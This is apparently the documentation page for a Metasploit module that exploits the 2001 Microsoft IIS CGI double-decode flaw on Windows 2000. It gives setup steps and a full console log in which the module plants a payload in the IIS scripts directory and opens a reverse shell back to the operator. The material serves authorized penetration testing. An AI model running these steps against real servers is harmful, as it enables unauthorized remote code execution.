72 lines
2.1 KiB
Markdown
72 lines
2.1 KiB
Markdown
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
This module will execute an arbitrary payload on a Microsoft IIS installation
|
||
|
|
that is vulnerable to the CGI double-decode vulnerability of 2001.
|
||
|
|
|
||
|
|
This module has been tested successfully on:
|
||
|
|
|
||
|
|
* Windows 2000 Professional (SP0) (EN)
|
||
|
|
* Windows 2000 Professional (SP1) (AR)
|
||
|
|
* Windows 2000 Professional (SP1) (CZ)
|
||
|
|
* Windows 2000 Server (SP0) (FR)
|
||
|
|
* Windows 2000 Server (SP1) (EN)
|
||
|
|
* Windows 2000 Server (SP1) (SE)
|
||
|
|
|
||
|
|
Note: This module will leave a Metasploit payload in the IIS scripts directory.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. `use exploit/windows/iis/ms01_026_dbldecode`
|
||
|
|
1. `set RHOSTS [IP]`
|
||
|
|
1. `set PAYLOAD windows/shell/reverse_tcp`
|
||
|
|
1. `set LHOST [IP]`
|
||
|
|
1. `run`
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
### WINDIR
|
||
|
|
|
||
|
|
The Windows directory name of the target host.
|
||
|
|
The directory name will be detected automatically if not set.
|
||
|
|
|
||
|
|
### DEPTH
|
||
|
|
|
||
|
|
Traversal depth to reach the drive root (default: `2`)
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### Windows 2000 Server (SP0) (FR)
|
||
|
|
|
||
|
|
```
|
||
|
|
msf6 > use exploit/windows/iis/ms01_026_dbldecode
|
||
|
|
[*] Using configured payload windows/shell/reverse_tcp
|
||
|
|
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
|
||
|
|
rhosts => 192.168.200.175
|
||
|
|
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
|
||
|
|
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
|
||
|
|
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
|
||
|
|
lhost => 192.168.200.130
|
||
|
|
msf6 exploit(windows/iis/ms01_026_dbldecode) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.200.130:4444
|
||
|
|
[*] Using Windows directory "winnt"
|
||
|
|
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
|
||
|
|
[*] Command Stager progress - 66.67% done (40/60 bytes)
|
||
|
|
[*] Command Stager progress - 100.00% done (60/60 bytes)
|
||
|
|
[*] Triggering payload "qQErEZeB.exe" via a direct request...
|
||
|
|
[*] Encoded stage with x86/shikata_ga_nai
|
||
|
|
[*] Sending encoded stage (267 bytes) to 192.168.200.175
|
||
|
|
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
|
||
|
|
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
|
||
|
|
|
||
|
|
|
||
|
|
Shell Banner:
|
||
|
|
Microsoft Windows 2000 [Version 5.00.2195]
|
||
|
|
-----
|
||
|
|
|
||
|
|
|
||
|
|
c:\inetpub\scripts>hostname
|
||
|
|
hostname
|
||
|
|
win2k-srv-fr
|
||
|
|
```
|